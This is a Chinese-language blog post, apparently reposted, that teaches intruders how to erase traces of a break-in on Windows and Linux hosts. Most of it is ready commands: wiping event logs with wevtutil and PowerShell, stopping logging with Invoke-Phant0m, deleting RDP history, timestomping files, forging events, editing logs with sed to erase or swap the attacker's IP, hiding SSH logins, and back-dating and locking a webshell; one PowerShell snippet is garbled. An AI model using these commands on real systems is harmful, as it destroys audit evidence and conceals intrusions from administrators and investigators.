痕跡清除
目的，清除自己入侵目標(biāo)主機(jī)的痕跡（不可能完全清除）
windows默認(rèn)日志文件地址
Windows日志文件默認(rèn)位置是“%systemroot%\system32\config
安全日志文件：%systemroot%\system32\config \SecEvent.EVT
系統(tǒng)日志文件：%systemroot%\system32\config \SysEvent.EVT
應(yīng)用程序日志文件：%systemroot%\system32\config \AppEvent.EVT
FTP連接日志和HTTPD事務(wù)日志：
%systemroot% \system32\LogFiles
linux日志文件地址
/var/log/message
內(nèi)核消息及各種應(yīng)用程序的公共日志信息,包括啟動、I/O錯誤、 網(wǎng)絡(luò)錯誤、
/var/log/cron Crond周期性計劃任務(wù)產(chǎn)生的時間信息
/var/log/dmesg 弓|導(dǎo)過程中的各種時間信息
/var/log/ maillog 進(jìn)入或發(fā)出系統(tǒng)的電子郵件活動
/var/log/lastlog 每個用戶最近的登錄事件
/var/log/secure 用戶認(rèn)證相關(guān)的安全事件信息
/var/log/wtmp 每個用戶登錄注銷及系統(tǒng)啟動和停機(jī)事件
/var/log/btmp 失敗的、錯誤的登錄嘗試及驗(yàn)證事件
主要兩種方法
第一種直接停止日志記錄
再進(jìn)行操作
第二種，操作完成之后，刪除自己的操作記錄（混淆日志）
第一種，使用Invoke-Phant0m直接停止日志文件的記錄
https://github.com/hlldz/Invoke-Phant0m
https://github.com/QAX-A-Team/EventCleaner（可以暫停，繼續(xù)，還可以刪除指定日志內(nèi)容）
第二種：
1.cmd方法
wevtutil el 列出系統(tǒng)中所有日志名稱
wevtutil cl system 清理系統(tǒng)日志
wevtutil cl application 清理應(yīng)用程序日志
wevtutil cl security 清理安全日志
2.PowerShell清除Windows事件日志

PowerShell -Command “& {Clear-Eventlog -Log Application,System,Security}”

Get-WinEvent -ListLog Application,Setup,Security -Force | % {Wevtutil.exe cl $_.Logname}
2.清除recent（最近操作的內(nèi)容）：
或直接打開C:\Users\Administrator\Recent并刪除所有內(nèi)容
或在命令行中輸入del /f /s /q “%userprofile%\Recent*.*
3.IIS日志
IIS默認(rèn)日志路徑：
%SystemDrive%\inetpub\logs\LogFiles\W3SVC1
停止服務(wù)：net stop w3svc
刪除日志目錄下所有文件：del .
啟用服務(wù)：net start w3svc
4.利用Windows自帶命令進(jìn)行安全擦除（文件的刪除）

（1）Shift+Delete快捷鍵永久刪除（3389連接目標(biāo)主機(jī)后）

直接刪除文件，還是能在回收站找到的，使用Shift+Delete快捷鍵可以直接永久刪除了。但是用數(shù)據(jù)恢復(fù)軟件，刪除的文件盡快恢復(fù)，否則新的文件存入覆蓋了原來的文件痕跡就很難恢復(fù)了。

（2）Cipher 命令多次覆寫（防止垃圾桶文件恢復(fù)）

在刪除文件后，可以利用Cipher 命令通過 /W 參數(shù)可反復(fù)寫入其他數(shù)據(jù)覆蓋已刪除文件的硬盤空間，徹底刪除數(shù)據(jù)防止被恢復(fù)。
比如，刪除D:\tools目錄下的文件，然后執(zhí)行這條命令：
cipher /w:D:\tools
這樣一來，D 盤上未使用空間就會被覆蓋三次：一次 0x00、一次 0xFF，一次隨機(jī)數(shù)，所有被刪除的文件就都不可能被恢復(fù)了。

（3）Format命令覆蓋格式化（防止垃圾桶文件恢復(fù)）
Format 命令加上 /P 參數(shù)后，就會把每個扇區(qū)先清零，再用隨機(jī)數(shù)覆蓋。而且可以覆蓋多次。比如：
format D: /P:8

這條命令表示把 D 盤用隨機(jī)數(shù)覆蓋 8 次
5.清除3389遠(yuǎn)程登錄日志
清除遠(yuǎn)程桌面連接記錄
當(dāng)通過本機(jī)遠(yuǎn)程連接其他客戶端或服務(wù)器后，會在本機(jī)存留遠(yuǎn)程桌面連接記錄。
@echo off
reg delete “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default” /va /f
reg delete “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers” /f
reg add “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers”
cd %userprofile%\documents
attrib Default.rdp -s -h
del Default.rdp
代碼保存為clear.bat文件，cmd執(zhí)行clear.bat行即可自動化清除遠(yuǎn)程桌面連接記錄

6.修改文件創(chuàng)建時間（以pass.txt為例）
（貼鏈接：https://cloud.tencent.com/developer/article/1805897）
Function edit_time(KaTeX parse error: Expected '}', got 'EOF' at end of input: path){date1 =Get-ChildItem |
Select LastWriteTime|Get-Random;$date2=Get?ChildItem|SelectLastWriteTime|Get?Random;$date3 =Get-ChildItem |
Select LastWriteTime|Get-Random;$(Get-Item $path).lastaccesstime=$date1.LastWriteTime;
$(Get-Item $path).creationtime=$date2.LastWriteTime ;
$(Get-Item $path).lastwritetime=$date3.LastWriteTime};
edit_time(“C:\Users\saulGoodman\Desktop\工具包\pass.txt”)

7.混淆日志
使用eventcreate這個命令行工具來偽造日志或者使用自定義的大量垃圾信息覆蓋現(xiàn)有日志。
eventcreate -l system -so administrator -t warning -d “this is a test” -id 500

8.msf清除日志方法
run event_manager -i
或者直接clearv
貼連接：https://cloud.tencent.com/developer/article/1698537

linux日志清除（主要包括修改（刪除）日志文件，修改文件創(chuàng)建時間等）
查看歷史操作命令：history
history記錄文件：more ~/.bash_history
vim ~/.bash_history（編輯history記錄文件，刪除部分不想被保存的歷史命令）
history -c（清除當(dāng)前用戶的history命令記錄）
當(dāng)我們使用 vim時候,會在 ~/.viminfo留下操作記錄，建議使用 vi ，或者在vim中使用命令關(guān)閉記錄。
:set history=0 :!command
通過修改配置文件/etc/profile，使系統(tǒng)不再保存命令記錄。
HISTSIZE=0
清除系統(tǒng)日志
echo > /var/log/btmp（清除登錄系統(tǒng)失敗的記錄）
echo > /var/log/wtmp（清除登錄系統(tǒng)成功的記錄）
echo > /var/log/lastlog （清除用戶最后一次登錄時間）
echo > /var/log/utmp（清除當(dāng)前登錄用戶的信息）
cat /dev/null > /var/log/secure（清除安全日志記錄）
cat /dev/null > /var/log/message（清除系統(tǒng)日志記錄）
刪除/替換部分日志
日志文件全部被清空，容易被管理員察覺了，刪除或者更改部分日志可以更好地隱藏自己

刪除所有匹配到字符串的行,比如以當(dāng)天日期或者自己的登錄ip
sed -i '/自己的ip/'d /var/log/messages

全局替換登錄IP地址：
sed -i ‘s/192.168.166.85/192.168.1.1/g’ secure

清除web入侵痕跡

第一種方式： 直接替換日志ip地址
sed -i ‘s/192.168.166.85/192.168.1.1/g’ access.log

第二種方式：清除部分相關(guān)日志
cat tmp.log > /var/log/nginx/access.log/

文件安全刪除工具
shred 命令 安全的從硬盤上擦除數(shù)據(jù)，默認(rèn)覆蓋3次，通過 -n指定數(shù)據(jù)覆蓋次數(shù)
shred -f -u -z -v -n 3 1.txt

dd命令
可用于安全地清除硬盤或者分區(qū)的內(nèi)容。
dd if=/dev/zero of=要刪除的文件 bs=大小 count=寫入的次數(shù)

隱藏遠(yuǎn)程SSH登陸記錄

隱身登錄系統(tǒng)，不會被w、who、last等指令檢測到。
ssh -T root@192.168.0.1 /bin/bash -i

不記錄ssh公鑰在本地.ssh目錄中
ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash –i

隱藏文件修改時間
一般管理員會查看一個文件的修改時間，我們可以把我們的后門文件時間修改成幾天之前創(chuàng)建的效果。使用如下命令。
touch -r A B 使B文件時間變得和A文件相同
touch -r index.html shell.php

防止日志文件被修改方式
鎖定文件，只可以添加數(shù)據(jù)，不能夠進(jìn)行刪除，更改等操作
chattr +i shell.php #鎖定文件
rm -rf shell.php #提示禁止刪除
lsattr shell.php #屬性查看
chattr -i shell.php #解除鎖定
rm -rf shell.php #刪除文件
貼鏈接：
https://cloud.tencent.com/developer/article/1897023
https://blog.csdn.net/chenzzhenguo/article/details/108880297

總結(jié)

以上是生活随笔為你收集整理的痕迹清除的几种方式的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。